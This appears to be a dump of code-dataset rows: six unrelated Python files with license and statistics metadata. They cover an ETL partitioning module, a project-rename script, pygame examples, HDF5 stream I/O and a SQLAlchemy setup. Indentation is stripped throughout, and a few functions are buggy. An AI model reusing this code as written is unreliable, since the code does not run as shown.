self.pipe.write("%s%s" % (self.fieldsep.join(data), self.rowsep))
def _insertwithoutnulls(self, row, namemapping={}):
"""Insert a fact into the fact table.
Arguments:
- row: a dict at least containing values for the keys and measures.
- namemapping: an optional namemapping (see module's documentation)
"""
data = [str(row[namemapping.get(att) or att]) for att in self.all]
self.pipe.write("%s%s" % (self.fieldsep.join(data), self.rowsep))
def endload(self):
"""Finalize the load."""
if self.endcommand is not None:
self.pipe.write(self.endcommand)
self.pipe.close()
if self.terminateafter >= 0:
sleep(self.terminateafter)
self.process.terminate()
else:
self.process.wait()
def _decoupling(self):
"""Raise a TypeError to avoid decoupling (does not happen in Jython)"""
import sys
if sys.platform.startswith('java'):
# In Jython, we use threads for decoupling and we do not have
# to prevent it.
return
raise TypeError('A SubProcessFactTable cannot be decoupled')
class DecoupledDimension(pygrametl.parallel.Decoupled):
"""A Dimension-like class that enables parallelism by executing all
operations on a given Dimension in a separate, dedicated process
(that Dimension is said to be "decoupled").
"""
def __init__(self, dim, returnvalues=True, consumes=(), attstoconsume=(),
batchsize=500, queuesize=200):
"""Arguments:
- dim: the Dimension object to use in a separate process
- returnvalues: decides if return values from method calls on dim
should be kept such that they can be fetched by the caller or
another Decoupled instance
- consumes: a sequence of Decoupled objects from which to fetch
returnvalues (that are used to replace FutureResults in arguments).
Default: ()
- attstoconsume: a sequence of the attribute names in rows that
should have FutureResults replaced by actual return values. Does
not have to be given, but may improve performance when given.
Default: ()
- batchsize: the size of batches (grouped method calls) transferred
between the processes. NB: Large values do not necessarily give
good performance
Default: 500
- queuesize: the maximum amount of waiting batches. Infinite if
less than or equal to 0. NB: Large values do not necessarily give
good performance.
Default: 200
"""
pygrametl.parallel.Decoupled.__init__(self,
obj=dim,
returnvalues=returnvalues,
consumes=consumes,
directupdatepositions=
tuple([(0, a) for a in
attstoconsume]),
batchsize=batchsize,
queuesize=queuesize,
autowrap=False)
if dim in pygrametl._alltables:
pygrametl._alltables.remove(dim) # We add self instead...
pygrametl._alltables.append(self)
def lookup(self, row, namemapping={}):
"""Invoke lookup on the decoupled Dimension in the separate process"""
return self._enqueue('lookup', row, namemapping)
def getbykey(self, keyvalue):
"""Invoke getbykey on the decoupled Dimension in the separate process"""
return self._enqueue('getbykey', keyvalue)
def getbyvals(self, row, namemapping={}):
"Invoke betbycals on the decoupled Dimension in the separate process"
return self._enqueue('getbyvals', row, namemapping)
def insert(self, row, namemapping={}):
"""Invoke insert on the decoupled Dimension in the separate process"""
return self._enqueue('insert', row, namemapping)
def ensure(self, row, namemapping={}):
"""Invoke ensure on the decoupled Dimension in the separate process"""
return self._enqueue('ensure', row, namemapping)
def endload(self):
"""Invoke endload on the decoupled Dimension in the separate process and
return when all waiting method calls have been executed
"""
# first add 'endload' to the batch and then send the batch
self._enqueuenoreturn('endload')
self._endbatch()
self._join()
return None
def scdensure(self, row, namemapping={}):
"Invoke scdensure on the decoupled Dimension in the separate process"
if hasattr(self._obj, 'scdensure'):
return self._enqueue('scdensure', row, namemapping)
else:
raise AttributeError('The object does not support scdensure')
class DecoupledFactTable(pygrametl.parallel.Decoupled):
"""A FactTable-like class that enables parallelism by executing all
operations on a given FactTable in a separate, dedicated process
(that FactTable is said to be "decoupled").
"""
def __init__(self, facttbl, returnvalues=True, consumes=(),
attstoconsume=(), batchsize=500, queuesize=200):
"""Arguments:
- facttbl: the FactTable object to use in a separate process
- returnvalues: decides if return values from method calls on facttbl
should be kept such that they can be fetched by the caller or
another Decoupled instance
- consumes: a sequence of Decoupled objects from which to fetch
returnvalues (that are used to replace FutureResults in arguments).
Default: ()
- attstoconsume: a sequence of the attribute names in rows that
should have FutureResults replaced by actual return values. Does
not have to be given, but may improve performance when given.
Default: ()
- batchsize: the size of batches (grouped method calls) transferred
between the processes. NB: Large values do not necessarily give
good performance
Default: 500
- queuesize: the maximum amount of waiting batches. Infinite if
less than or equal to 0. NB: Large values do not necessarily give
good performance.
Default: 200
"""
pygrametl.parallel.Decoupled.__init__(self,
obj=facttbl,
returnvalues=returnvalues,
consumes=consumes,
directupdatepositions=tuple([(0,
a) for a in attstoconsume]),
batchsize=batchsize,
queuesize=queuesize,
autowrap=False)
if facttbl in pygrametl._alltables:
pygrametl._alltables.remove(facttbl) # We add self instead
pygrametl._alltables.append(self)
def insert(self, row, namemapping={}):
"""Invoke insert on the decoupled FactTable in the separate process"""
return self._enqueue('insert', row, namemapping)
def endload(self):
"""Invoke endload on the decoupled FactTable in the separate process and
return when all waiting method calls have been executed
"""
self._enqueuenoreturn('endload')
self._endbatch()
self._join()
return None
def lookup(self, row, namemapping={}):
"""Invoke lookup on the decoupled FactTable in the separate process"""
if hasattr(self._obj, 'lookup'):
return self._enqueue('lookup', row, namemapping)
else:
raise AttributeError('The object does not support lookup')
def ensure(self, row, namemapping={}):
"""Invoke ensure on the decoupled FactTable in the separate process"""
if hasattr(self._obj, 'ensure'):
return self._enqueue('ensure', row, namemapping)
else:
raise AttributeError('The object does not support ensure')
#######
class BasePartitioner(object):
"""A base class for partitioning between several parts.
See also DimensionPartitioner and FactTablePartitioner.
"""
def __init__(self, parts):
self.parts = list(parts)
self.__nextpart = 0
def parts(self):
"""Return the parts the partitioner works on"""
return self.parts[:]
def addpart(self, part):
"""Add a part"""
self.parts.append(part)
def droppart(self, part=None):
"""Drop a part. If an argument is given, it must be a part of the
patitioner and it will then be removed. If no argument is given,
the first part is removed."""
if part is None:
self.parts.pop()
else:
self.parts.remove(part)
def getpart(self, row, namemapping={}):
"""Find the part that should handle the given row. The provided
implementation in BasePartitioner does only use round robin
partitioning, but subclasses apply other methods """
part = self.parts[self.__nextpart]
self.__nextpart = (self.__nextpart + 1) % len(self.parts)
return part
def endload(self):
"""Call endload on all parts"""
for part in self.parts:
part.endload()
class DimensionPartitioner(BasePartitioner):
"""A Dimension-like class that handles partitioning.
Partitioning is done between a number of Dimension objects called the
parts. The class offers the interface of Dimensions (incl. scdensure
from SlowlyChangingDimension). When a method is called, the
corresponding method on one of the parts (chosen by a user-definable
partitioner function) will be invoked. The parts can operate on a
single physical dimension table or different physical tables.
"""
def __init__(self, parts, getbyvalsfromall=False, partitioner=None):
"""Arguments:
- parts: a sequence of Dimension objects.
- getbyvalsfromall: determines if getbyvals should be answered by
means of all parts (when getbyvalsfromall = True) or only the
first part, i.e., parts[0] (when getbybalsfromall = False).
Default: False
- partitioner: None or a callable p(dict) -> int where the argument
is a dict mapping from the names of the lookupatts to the values of
the lookupatts. The resulting int is used to determine which part
a given row should be handled by.
When partitioner is None, a default partitioner is used. This
partitioner computes the hash value of each value of the lookupatts
and adds them together.
"""
BasePartitioner.__init__(self, parts=parts)
self.getbyvalsfromall = getbyvalsfromall
self.lookupatts = parts[0].lookupatts
self.key = parts[0].key
for p in parts:
if not p.lookupatts == self.lookupatts:
raise ValueError('The parts must have the same lookupatts')
if not p.key == self.key:
raise ValueError('The parts must have the same key')
if partitioner is not None:
self.partitioner = partitioner
else:
# A partitioner that takes the hash of each attribute value in
# row and adds them all together:
# Reading from right to left: get the values, use hash() on each
# of them, and add all the hash values
self.partitioner = lambda row: reduce((lambda x, y: x + y),
map(hash, row.values()))
def getpart(self, row, namemapping={}):
"""Return the part that should handle the given row"""
vals = {}
for att in self.lookupatts:
vals[att] = row[namemapping.get(att) or att]
return self.parts[self.partitioner(vals) % len(self.parts)]
# Below this, methods like those in Dimensions:
def lookup(self, row, namemapping={}):
"""Invoke lookup on the relevant Dimension part"""
part = self.getpart(row, namemapping)
return part.lookup(row, namemapping)
def __getbykeyhelper(self, keyvalue):
# Returns (rowresult, part). part is None if no result was found.
for part in self.parts:
row = part.getbykey(keyvalue)
if row[self.key] is not None:
return (row, part)
return (row, None)
def getbykey(self, keyvalue):
"""Invoke getbykey on the relevant Dimension part"""
return self.__getbykeyhelper(keyvalue)[0]
def getbyvals(self, values, namemapping={}):
"""Invoke getbyvals on the first part or all parts (depending on the
value of the instance's getbyvalsfromall)"""
if not self.getbyvalsfromall:
return self.parts[0].getbyvals(values, namemapping)
res = []
for part in self.parts:
res += part.getbyvals(values, namemapping)
return res
def update(self, row, namemapping={}):
"""Invoke update on the relevant Dimension part"""
keyval = row[namemapping.get(self.key) or self.key]
part = self.__getbykeyhelper(keyval)[1]
if part is not None:
part.update(row, namemapping)
def ensure(self, row, namemapping={}):
"""Invoke ensure on the relevant Dimension part"""
part = self.getpart(row, namemapping)
return part.ensure(row, namemapping)
def insert(self, row, namemapping={}):
"""Invoke insert on the relevant Dimension part"""
part = self.getpart(row, namemapping)
return part.insert(row, namemapping)
def scdensure(self, row, namemapping={}):
"""Invoke scdensure on the relevant Dimension part"""
part = self.getpart(row, namemapping)
return part.scdensure(row, namemapping)
class FactTablePartitioner(BasePartitioner):
"""A FactTable-like class that handles partitioning.
Partitioning is done between a number of FactTable objects called the
parts. The class offers the interface of FactTable. When a method is
called, the corresponding method on one of the parts (chosen by a
user-definable partitioner function) will be invoked. The parts can
operate on a single physical fact table or different physical
tables.
"""
def __init__(self, parts, partitioner=None):
"""
Arguments:
- parts: a sequence of FactTable objects.
- partitioner: None or a callable p(dict) -> int where the argument
is a dict mapping from the names of the keyrefs to the values of
the keyrefs. The resulting int is used to determine which part
a given row should be handled by.
When partitioner is None, a default partitioner is used. This
partitioner computes the sum of all the keyrefs values.
"""
BasePartitioner.__init__(self, parts=parts)
if partitioner is not None:
self.partitioner = partitioner
else:
self.partitioner = lambda row: reduce((lambda x, y: x + y),
row.values())
self.all = parts[0].all
self.keyrefs = parts[0].keyrefs
self.measures = parts[0].measures
for ft in parts:
if not (self.keyrefs == ft.keyrefs and
self.measures == ft.measures):
raise ValueError(
'The parts must have the same measures and keyrefs')
def getpart(self, row, namemapping={}):
"""Return the relevant part for the given row """
vals = {}
for att in self.keyrefs:
vals[att] = row[namemapping.get(att) or att]
return self.parts[self.partitioner(vals) % len(self.parts)]
def insert(self, row, namemapping={}):
"""Invoke insert on the relevant part """
part = self.getpart(row, namemapping)
part.insert(row, namemapping)
def lookup(self, row, namemapping={}):
"""Invoke lookup on the relevant part """
part = self.getpart(row, namemapping)
return part.lookup(row, namemapping)
def ensure(self, row, namemapping={}):
"""Invoke ensure on the relevant part """
part = self.getpart(row, namemapping)
return part.ensure(row, namemapping)
|
bsd-2-clause
| -3,030,556,517,807,855,600
| 44.030871
| 104
| 0.586979
| false
| 4.564654
| false
| false
| false
|
amarchen/log4qt-demo-sailfish
|
rename-to-my-project.py
|
1
|
3857
|
'''
Created on 23.2.2014
@author: tace (samuli.silvius@gmail.com)
'''
import sys
import os
import argparse
from os import rename
SCRIPT_NAME = os.path.basename(__file__)
def convert_file_names(files, originalName, newName):
print "\n>>>> Convert file names\n"
for fname in files:
if fname.find(originalName) != -1:
newFullName = fname.replace(originalName, newName, 1)
rename(fname, newFullName)
print "Renamed file " + fname + " --> " + newFullName
else:
print "File's '" + fname + "' name does not need conversion!"
print ">>>> DONE converting filenames"
print "====================================================================\n"
def convert_files_content(files, originalText, newText):
print "\n>>>> Convert files content\n"
for file in files:
newlines = []
with open(file, 'r') as f:
found = False
for i, line in enumerate(f, 1):
if line.find(originalText) != -1:
print "Converting text in file '" + file + "' at line " + str(i)
found = True
newlines.append(line.replace(originalText, newText))
if not found:
print "File " + file + " don't need editing."
with open(file, 'w') as f:
for line in newlines:
f.write(line)
print ">>>> DONE converting files content"
print "====================================================================\n"
def get_files(path,
ignored_dirs=['.git'],
ignored_files=[SCRIPT_NAME],
ignore_binary_files=False):
for prefix, dirs, files in os.walk(path):
for ignore in ignored_dirs:
if ignore in dirs:
dirs.remove(ignore)
print "Ignored dir: " + ignore
for name in files:
ignored = False
for ignore in ignored_files:
if ignore in name:
files.remove(ignore)
ignored = True
print "Ignored file: " + ignore
if not ignored:
filename = os.path.join(prefix, name)
if ignore_binary_files and is_binary(filename):
print filename + " is BINARY file and ignored by default!"
else:
yield filename
def is_binary(filename):
"""
Return true if the given filename appears to be binary.
File is considered to be binary if it contains a NULL byte.
FIXME: This approach incorrectly reports UTF-16 as binary.
"""
with open(filename, 'rb') as f:
for block in f:
if '\0' in block:
return True
return False
def check_args(args):
if not args.newName.startswith('harbour-'):
print "Your new app name MUST start with \"harbour-\""
sys.exit()
def main():
parser = argparse.ArgumentParser()
parser.add_argument('newName', help='New name of your program')
parser.add_argument('--originalName', nargs='?', default='harbour-helloworld-pro-sailfish', help="Default is '%(default)s'")
parser.add_argument('--ignoredDirs', nargs='*', default=['.git'], help="Give a list of dir paths separated with space. Default is '%(default)s'")
parser.add_argument('--ignoredFiles', nargs='*', default=[SCRIPT_NAME], help="Give a list of file paths separated with space. Default is '%(default)s'")
args = parser.parse_args()
check_args(args)
files = get_files(".", args.ignoredDirs, args.ignoredFiles)
convert_file_names(files, args.originalName, args.newName)
files = get_files(".", args.ignoredDirs, args.ignoredFiles, ignore_binary_files=True)
convert_files_content(files, args.originalName, args.newName)
if __name__ == '__main__':
main()
|
unlicense
| 760,484,320,337,282,400
| 37.188119
| 156
| 0.56028
| false
| 4.183297
| false
| false
| false
|
mark-me/Pi-Jukebox
|
venv/Lib/site-packages/pygame/examples/mask.py
|
1
|
5555
|
#!/usr/bin/env python
"""A pgyame.mask collition detection example
exports main()
This module can also be run as a stand-alone program, excepting
one or more image file names as command line arguments.
"""
import sys, random
import pygame, pygame.image, pygame.surface, pygame.time, pygame.display
def maskFromSurface(surface, threshold = 127):
#return pygame.mask.from_surface(surface, threshold)
mask = pygame.mask.Mask(surface.get_size())
key = surface.get_colorkey()
if key:
for y in range(surface.get_height()):
for x in range(surface.get_width()):
if surface.get_at((x,y)) != key:
mask.set_at((x,y),1)
else:
for y in range(surface.get_height()):
for x in range (surface.get_width()):
if surface.get_at((x,y))[3] > threshold:
mask.set_at((x,y),1)
return mask
def vadd(x,y):
return [x[0]+y[0],x[1]+y[1]]
def vsub(x,y):
return [x[0]-y[0],x[1]-y[1]]
def vdot(x,y):
return x[0]*y[0]+x[1]*y[1]
class Sprite:
def __init__(self, surface, mask = None):
self.surface = surface
if mask:
self.mask = mask
else:
self.mask = maskFromSurface(self.surface)
self.setPos([0,0])
self.setVelocity([0,0])
def setPos(self,pos):
self.pos = [pos[0],pos[1]]
def setVelocity(self,vel):
self.vel = [vel[0],vel[1]]
def move(self,dr):
self.pos = vadd(self.pos,dr)
def kick(self,impulse):
self.vel[0] += impulse[0]
self.vel[1] += impulse[1]
def collide(self,s):
"""Test if the sprites are colliding and
resolve the collision in this case."""
offset = [int(x) for x in vsub(s.pos,self.pos)]
overlap = self.mask.overlap_area(s.mask,offset)
if overlap == 0:
return
"""Calculate collision normal"""
nx = (self.mask.overlap_area(s.mask,(offset[0]+1,offset[1])) -
self.mask.overlap_area(s.mask,(offset[0]-1,offset[1])))
ny = (self.mask.overlap_area(s.mask,(offset[0],offset[1]+1)) -
self.mask.overlap_area(s.mask,(offset[0],offset[1]-1)))
if nx == 0 and ny == 0:
"""One sprite is inside another"""
return
n = [nx,ny]
dv = vsub(s.vel,self.vel)
J = vdot(dv,n)/(2*vdot(n,n))
if J > 0:
"""Can scale up to 2*J here to get bouncy collisions"""
J *= 1.9
self.kick([nx*J,ny*J])
s.kick([-J*nx,-J*ny])
return
"""Separate the sprites"""
c1 = -overlap/vdot(n,n)
c2 = -c1/2
self.move([c2*nx,c2*ny])
s.move([(c1+c2)*nx,(c1+c2)*ny])
def update(self,dt):
self.pos[0] += dt*self.vel[0]
self.pos[1] += dt*self.vel[1]
def main(*args):
"""Display multiple images bounce off each other using collition detection
Positional arguments:
one or more image file names.
This pygame.masks demo will display multiple moving sprites bouncing
off each other. More than one sprite image can be provided.
"""
if len(args) == 0:
raise ValueError("Require at least one image file name: non given")
print ('Press any key to quit')
screen = pygame.display.set_mode((640,480))
images = []
masks = []
for impath in args:
images.append(pygame.image.load(impath).convert_alpha())
masks.append(maskFromSurface(images[-1]))
numtimes = 10
import time
t1 = time.time()
for x in range(numtimes):
m = maskFromSurface(images[-1])
t2 = time.time()
print ("python maskFromSurface :%s" % (t2-t1))
t1 = time.time()
for x in range(numtimes):
m = pygame.mask.from_surface(images[-1])
t2 = time.time()
print ("C pygame.mask.from_surface :%s" % (t2-t1))
sprites = []
for i in range(20):
j = i % len(images)
s = Sprite(images[j],masks[j])
s.setPos((random.uniform(0,screen.get_width()),
random.uniform(0,screen.get_height())))
s.setVelocity((random.uniform(-5,5),random.uniform(-5,5)))
sprites.append(s)
pygame.time.set_timer(pygame.USEREVENT,33)
while 1:
event = pygame.event.wait()
if event.type == pygame.QUIT:
return
elif event.type == pygame.USEREVENT:
"""Do both mechanics and screen update"""
screen.fill((240,220,100))
for i in range(len(sprites)):
for j in range(i+1,len(sprites)):
sprites[i].collide(sprites[j])
for s in sprites:
s.update(1)
if s.pos[0] < -s.surface.get_width()-3:
s.pos[0] = screen.get_width()
elif s.pos[0] > screen.get_width()+3:
s.pos[0] = -s.surface.get_width()
if s.pos[1] < -s.surface.get_height()-3:
s.pos[1] = screen.get_height()
elif s.pos[1] > screen.get_height()+3:
s.pos[1] = -s.surface.get_height()
screen.blit(s.surface,s.pos)
pygame.display.update()
elif event.type == pygame.KEYDOWN:
return
if __name__ == '__main__':
if len(sys.argv) < 2:
print ('Usage: mask.py <IMAGE> [<IMAGE> ...]')
print ('Let many copies of IMAGE(s) bounce against each other')
print ('Press any key to quit')
else:
main(*sys.argv[1:])
|
agpl-3.0
| 1,926,169,614,142,610,700
| 30.5625
| 78
| 0.540954
| false
| 3.340349
| false
| false
| false
|
CHIMEFRB/ch_frb_io
|
ch_frb_io/stream.py
|
1
|
13853
|
"""
IO for intensity data.
"""
import os
from os import path
import warnings
import logging
import glob
import numpy as np
import h5py
import bitshuffle.h5 as bshufh5
logger = logging.getLogger(__name__)
# Default chunk and file size.
CHUNKS = (64, 2, 256)
NTIME_PER_FILE = CHUNKS[2] * 64
# Dataset definitions.
DATASETS = {
# 'time' is a special axis defining dataset. Must have units seconds since
# it is used for filenames.
'index_map/time' : {
'dtype' : np.float64,
'chunks' : (CHUNKS[2],),
},
'intensity' : {
'dtype' : np.float32,
'axis' : ['freq', 'pol', 'time'],
'chunks' : CHUNKS,
'compression' : bshufh5.H5FILTER,
'compression_opts' : (0, bshufh5.H5_COMPRESS_LZ4),
},
'weight' : {
'dtype' : np.uint8,
'axis' : ['freq', 'pol', 'time'],
'chunks' : CHUNKS,
'compression' : bshufh5.H5FILTER,
'compression_opts' : (0, bshufh5.H5_COMPRESS_LZ4),
},
}
class StreamWriter(object):
def __init__(self, outdir='', freq=None, pol=None, attrs=None):
# Default values for freq and pol.
if freq is None:
from ch_L1mock import constants
freq = (constants.FPGA_FREQ0 + np.arange(constants.FPGA_NFREQ)
* constants.FPGA_DELTA_FREQ)
if pol is None:
pol = ['XX', 'YY']
self._outdir = outdir
self._freq = freq
self._nfreq = len(freq)
self._pol = pol
self._npol = len(pol)
if attrs is None:
attrs = {}
self._attrs = attrs
# For now these are statically defined.
self._ntime_per_file = NTIME_PER_FILE
self._ntime_block = CHUNKS[2]
self._datasets = dict(DATASETS)
assert self._ntime_per_file % self.ntime_block == 0
# Initialize dataset buffers.
self._buffers = {}
datasets = dict(self._datasets)
time_info = datasets.pop('index_map/time')
self._buffers['index_map/time'] = np.empty(self.ntime_block,
dtype=time_info['dtype'])
for name, info in datasets.items():
if info['axis'] != ['freq', 'pol', 'time']:
msg = "Only ('freq', 'pol', 'time') datasets supported."
raise NotImplementedError(msg)
self._buffers[name] = np.empty(
(self._nfreq, self._npol, self.ntime_block),
dtype = info['dtype']
)
if self.ntime_block % info['chunks'][2]:
msg = "Integer number of chunks must fit into buffer."
raise ValueError(msg)
# TODO Check sanity of other chunk dimensions.
# Buffers initially empty.
self._ntime_buffer = 0
# Initialize output.
self._file = None
self._t0 = None # Offset for file names.
if not path.isdir(outdir):
os.mkdir(outdir)
# Ensure that warnings only issued once.
self._alignment_warned = False
def __del__(self):
self.finalize()
@property
def ntime_block(self):
"""Target write size. The size of the buffer when full."""
return self._ntime_block
@property
def ntime_buffer(self):
"""Current number of times currently in the buffer."""
return self._ntime_buffer
@property
def ntime_current_file(self):
"""Number of times in current file."""
if self._file is None:
return 0
else:
return len(self._file['index_map/time'])
@property
def ntime_per_file(self):
return self._ntime_per_file
def absorb_chunk(self, **kwargs):
"""
"""
time = kwargs.pop('time')
ntime = len(time)
for name, data in kwargs.items():
if data.shape != (self._nfreq, self._npol, ntime):
msg = "Inconsistent dimensions for dataset %s" % name
raise ValueError(msg)
kwargs['index_map/time'] = time
assert set(kwargs.keys()) == set(DATASETS.keys())
ntime_consumed = 0
while ntime_consumed < ntime:
ntime_remaining = ntime - ntime_consumed
if self.ntime_buffer == 0 and ntime_remaining >= self.ntime_block:
# If the buffers are empty and ntime is bigger than the buffer
# size, do a direct write.
to_write = (ntime_remaining
- (ntime_remaining % self.ntime_block))
to_write = min(to_write,
self._ntime_per_file - self.ntime_current_file)
self._append_data_disk(
ntime_consumed,
ntime_consumed + to_write,
**kwargs
)
ntime_consumed = ntime_consumed + to_write
else:
# Add data to buffers.
to_buffer = min(self.ntime_block - self.ntime_buffer,
ntime_remaining)
self._append_data_buffers(
ntime_consumed,
ntime_consumed + to_buffer,
**kwargs
)
ntime_consumed = ntime_consumed + to_buffer
def flush(self):
if (self.ntime_buffer != self.ntime_block
and not self._alignment_warned):
msg = ("Flushing buffers that are not full. Expect alignment"
" issues and performance degradation.")
logger.warning(msg)
self._alignment_warned = True
self._append_data_disk(0, self.ntime_buffer, **self._buffers)
self._ntime_buffer = 0
def finalize(self):
# Do nothing if this has already been called.
if hasattr(self, '_datasets'):
# Suppress warning if the buffers aren't full.
self._alignment_warned = True
self.flush()
if self._file:
self._file.close()
# The following does two things: releases memory which is nice, but
# more importantly invalidates the instance.
del self._buffers
del self._datasets
def _initialize_file(self, first_time):
# Files are named with their starting time relative to beginning of
# acquisition.
if self._t0 is None:
self._t0 = first_time
first_time -= self._t0
fname = '%08d.h5' % int(round(first_time))
fname = path.join(self._outdir, fname)
# Open file and write non-time-dependant datasets.
f = h5py.File(fname, mode='w')
for name, value in self._attrs.items():
f.attrs[name] = value
# Index map
im = f.create_group('index_map')
im.create_dataset('pol', data=self._pol)
im.create_dataset('freq', data=self._freq)
# Initialize time dependant datasets.
datasets = dict(self._datasets)
time_dset_info = datasets.pop('index_map/time')
f.create_dataset(
'index_map/time',
shape=(0,),
maxshape=(None,),
dtype=time_dset_info['dtype'],
chunks=time_dset_info['chunks'],
)
for dset_name, dset_info in datasets.items():
compression = dset_info.get('compression', None)
compression_opts = dset_info.get('compression_opts', None)
dset = f.create_dataset(
dset_name,
shape=(self._nfreq, self._npol, 0),
maxshape=(self._nfreq, self._npol, None),
dtype=dset_info['dtype'],
chunks=dset_info['chunks'],
compression=compression,
compression_opts=compression_opts,
)
dset.attrs['axis'] = dset_info['axis']
self._file = f
def _append_data_disk(self, start, stop, **kwargs):
if self._file is None:
first_time = kwargs['index_map/time'][start]
self._initialize_file(first_time)
ntime_disk = self.ntime_current_file
ntime = stop - start
time = kwargs.pop('index_map/time')
self._file['index_map/time'].resize((ntime_disk + ntime,))
self._file['index_map/time'][ntime_disk:] = time[start:stop]
for name, data in kwargs.items():
dset = self._file[name]
dset.resize((self._nfreq, self._npol, ntime_disk + ntime))
dset[...,ntime_disk:] = data[...,start:stop]
if ntime_disk + ntime >= self._ntime_per_file:
self._file.close()
self._file = None
def _append_data_buffers(self, start, stop, **kwargs):
ntime = stop - start
for name, data in kwargs.items():
buf = self._buffers[name]
buf_sl = np.s_[...,self.ntime_buffer:self.ntime_buffer + ntime]
buf[buf_sl] = data[...,start:stop]
self._ntime_buffer += ntime
if self.ntime_buffer == self.ntime_block:
self.flush()
class StreamReader(object):
def __init__(self, datadir):
filenames = glob.glob(path.join(datadir, ("[0-9]" * 8 + '.h5')))
filenames.sort()
self._filenames = filenames
first_file = h5py.File(filenames[0], mode='r')
self._attrs = first_file.attrs
self._freq = first_file['index_map/freq'][:]
self._pol = first_file['index_map/pol'][:]
time_arrs = []
for fname in filenames:
f = h5py.File(fname, mode='r')
time_arrs.append(f['index_map/time'][:])
f.close()
self._ntimes = [len(t) for t in time_arrs]
self._time = np.concatenate(time_arrs)
datasets = dict(DATASETS)
del datasets['index_map/time']
for k in datasets.keys():
if k not in first_file:
del datasets[k]
self._datasets = datasets
self._current_time_ind = 0
self._time_chunk = CHUNKS[2]
# The following no longer a constraint.
#for nt in self._ntimes[:-1]:
# if nt % self._time_chunk:
# raise ValueError("Files don't have integer number of chunks.")
self._h5_cache_start_ind = None
first_file.close()
@property
def attrs(self):
return dict(self._attrs)
@property
def filenames(self):
return list(self._filenames)
@property
def freq(self):
return self._freq.copy()
@property
def pol(self):
return self._pol.copy()
@property
def time(self):
return self._time.copy()
@property
def current_time_ind(self):
return self._current_time_ind
@property
def ntime_block(self):
"""Target read size."""
def finalize(self):
pass
#[f.close() for f in self._files]
def __del__(self):
self.finalize()
def yield_chunk(self, ntime=None):
start_time_ind = self.current_time_ind
ntime_remaining = len(self.time) - start_time_ind
if ntime is None:
ntime = min(self._chunk, ntime_remaining)
if ntime > ntime_remaining or ntime == 0:
raise StopIteration()
out = {}
out['time'] = self.time[start_time_ind:start_time_ind + ntime]
dataset_names = self._datasets.keys()
for dataset_name in dataset_names:
out[dataset_name] = []
while self.current_time_ind < start_time_ind + ntime:
# Ensure 'current_time_ind' is in the cache.
self._cache_h5_chunk()
# Determine where in the cache current_time_ind is.
h5_cache_ind = self.current_time_ind - self._h5_cache_start_ind
h5_cache_size = self._h5_cache[dataset_names[0]].shape[-1]
# How much data to copy from the current cache.
ntime_this_cache = min(
# Either the whole cache...
h5_cache_size - h5_cache_ind,
# ... or the rest of the data needed for this chunk.
start_time_ind + ntime - self.current_time_ind,
)
h5_cache_slice = np.s_[h5_cache_ind:
h5_cache_ind + ntime_this_cache]
for dataset_name in dataset_names:
out[dataset_name].append(
self._h5_cache[dataset_name][...,h5_cache_slice])
self._current_time_ind += ntime_this_cache
# Concatenate all the h5 chunks together to form an output chunk.
for dataset_name in dataset_names:
out[dataset_name] = np.concatenate(out[dataset_name], -1)
return out
def _cache_h5_chunk(self):
file_time_ind = self.current_time_ind
file_ntimes = list(self._ntimes)
which_file = 0
while file_time_ind >= file_ntimes[which_file]:
file_time_ind -= file_ntimes[which_file]
which_file += 1
# Get the hdf5 chunk that contains the index.
file_time_ind = (int(file_time_ind // self._time_chunk)
* self._time_chunk)
h5_cache_start_ind = (np.sum(file_ntimes[:which_file], dtype=int)
+ file_time_ind)
if self._h5_cache_start_ind == h5_cache_start_ind:
return
self._h5_cache_start_ind = h5_cache_start_ind
f = h5py.File(self._filenames[which_file], mode='r')
self._h5_cache = {}
for dataset_name in self._datasets.keys():
dataset = f[dataset_name]
self._h5_cache[dataset_name] = dataset[...,
file_time_ind:file_time_ind + self._time_chunk]
f.close()
|
mit
| 5,522,448,106,118,149,000
| 32.953431
| 79
| 0.532664
| false
| 3.8577
| false
| false
| false
|
martinohanlon/initio
|
pygametest.py
|
1
|
1057
|
import pygame
from pygame.locals import *
import os, sys
# set SDL to use the dummy NULL video driver,
# so it doesn't need a windowing system.
os.environ["SDL_VIDEODRIVER"] = "dummy"
# init pygame
pygame.init()
# create a 1x1 pixel screen, its not used
screen = pygame.display.set_mode((1, 1))
# init the joystick control
pygame.joystick.init()
# how many joysticks are there
print pygame.joystick.get_count()
# get the first joystick
joy = pygame.joystick.Joystick(0)
# init that joystick
joy.init()
running = True
while(running):
for event in pygame.event.get():
#thumb sticks, trigger buttons
if event.type == JOYAXISMOTION:
print event.value, event.axis
#d pad
elif event.type == JOYHATMOTION:
print event.value
#button pressed
elif event.type == JOYBUTTONDOWN:
print event.button
#button released
elif event.type == JOYBUTTONUP:
print event.button
|
mit
| -8,737,356,488,751,904,000
| 20.978261
| 46
| 0.613056
| false
| 3.535117
| false
| false
| false
|
mark-burnett/code-scientist
|
code_scientist/database/__init__.py
|
1
|
1655
|
# Copyright (C) 2012 Mark Burnett, David Morton
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sqlalchemy as _sa
import sqlalchemy.orm as _orm
import logging as _logging
import base as _base
import tables as _tables
from function import Function
from file import File
from file_set import FileSet
from snapshot import Snapshot
from repository import Repository
from tag import Tag
from metric import Metric
from metric_value import FunctionMetricValue, FileMetricValue
from metric_value import FileSetMetricValue, SnapshotMetricValue
def initialize(engine_string='sqlite://'):
_logging.debug('Creating SQLAlchemy engine for string: %s', engine_string)
engine = _sa.create_engine(engine_string)
_logging.debug('Creating tables.')
_base.Base.metadata.create_all(engine)
_base.Base.metadata.bind = engine
_logging.debug('Creating Session class.')
global Session
global UnscopedSession
UnscopedSession = _orm.sessionmaker(bind=engine)
Session = _orm.scoped_session(UnscopedSession)
|
gpl-3.0
| -3,192,524,026,105,203,000
| 34.212766
| 78
| 0.753474
| false
| 4.036585
| false
| false
| false
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.